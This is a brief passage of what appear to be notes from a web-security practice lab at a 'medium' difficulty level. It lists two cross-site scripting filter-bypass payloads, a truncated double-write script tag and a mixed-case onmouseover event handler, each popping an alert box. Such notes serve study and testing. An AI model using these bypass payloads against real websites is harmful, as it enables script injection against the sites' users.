medium-->
Double-write bypass: ript>alert(4)
Mixed-case bypass: onmouseover=’alert(9)’